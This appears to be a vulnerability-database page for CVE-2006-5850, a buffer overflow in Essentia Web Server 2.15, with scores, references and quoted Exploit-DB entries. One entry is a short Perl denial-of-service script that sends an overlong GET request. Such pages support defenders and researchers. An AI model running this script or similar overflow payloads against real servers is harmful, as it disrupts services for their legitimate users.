CVE-2006-5850
published 2006-11-10CVE-2006-5850: Stack-based buffer overflow in Essentia Web Server 2.15 for Windows allows remote attackers to execute arbitrary code via a long URI, as demonstrated by a GET…
PriorityP343high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
7.23%
93.5th percentile
Stack-based buffer overflow in Essentia Web Server 2.15 for Windows allows remote attackers to execute arbitrary code via a long URI, as demonstrated by a GET or HEAD request. NOTE: some of these details are obtained from third party information.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| essen | essentia_web_server | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Essentia Web Server 2.15 - GET Remote Denial of Service
exploitdb·2006-11-04
CVE-2006-5850 Essentia Web Server 2.15 - GET Remote Denial of Service
Essentia Web Server 2.15 - GET Remote Denial of Service
---
#!/usr/bin/perl
use IO::Socket;
use Getopt::Std; getopts('h:', \%args);
if (defined($args{'h'})) { $host = $args{'h'}; }
print STDERR "\n-=[ Essentia Web Server 2.15 Remote DOS Exploit]=-\n";
print STDERR "-=[ Discovered By CorryL [email protected] ]=-\n";
print STDERR "-=[ Coded by CorryL info:www.x0n3-h4ck.org ]=-\n\n";
if (!defined($host)) {
print "usage: perl " . $0 . " -h HOST\n";
exit();
}
$dos = "A"x6800;
print "[+] Connect to $host\n";
$socket = new IO::Socket::INET (PeerAddr => "$host",
PeerPort => 80,
Proto => 'tcp');
die unless $socket;
print "[+] Sending DOS byte\n";
$data = "GET /$dos \r\n\r\n";
# milw0rm.com [2006-11-04]
Exploit-DB
Essentia Web Server 2.1 - 'URL' Remote Buffer Overflow
exploitdb·2003-07-04
CVE-2006-5850 Essentia Web Server 2.1 - 'URL' Remote Buffer Overflow
Essentia Web Server 2.1 - 'URL' Remote Buffer Overflow
---
// source: https://www.securityfocus.com/bid/4159/info
Essentia Web Server is a multi-threaded HTTP server designed for Microsoft Windows and Linux environments. Essentia is maintained by Essen.
Essentia is prone to a remote denial of service. This condition may be triggered by submitting an excessively long URL (2000+ bytes). Successful exploitation will deny service to legitimate users and will require that the webserver be restarted to regain normal functionality.
This problem is due to a lack of bounds-checking on the length of URLs. Because of this, an attacker may also be able to exploit this condition to execute arbitrary code.
This issue was reported for Essentia Web Sever v2.1; earlier versions may also be affected.
No writeups or analysis indexed.
http://lists.grok.org.uk/pipermail/full-disclosure/2006-November/050537.htmlhttp://secunia.com/advisories/22718http://securityreason.com/securityalert/1846http://www.securityfocus.com/archive/1/451115/100/0/threadedhttp://www.securityfocus.com/archive/1/451382/100/200/threadedhttp://www.securityfocus.com/bid/20910http://www.vupen.com/english/advisories/2006/4384https://exchange.xforce.ibmcloud.com/vulnerabilities/30049https://www.exploit-db.com/exploits/2716http://lists.grok.org.uk/pipermail/full-disclosure/2006-November/050537.htmlhttp://secunia.com/advisories/22718http://securityreason.com/securityalert/1846http://www.securityfocus.com/archive/1/451115/100/0/threadedhttp://www.securityfocus.com/archive/1/451382/100/200/threadedhttp://www.securityfocus.com/bid/20910http://www.vupen.com/english/advisories/2006/4384https://exchange.xforce.ibmcloud.com/vulnerabilities/30049https://www.exploit-db.com/exploits/2716
2006-11-10
Published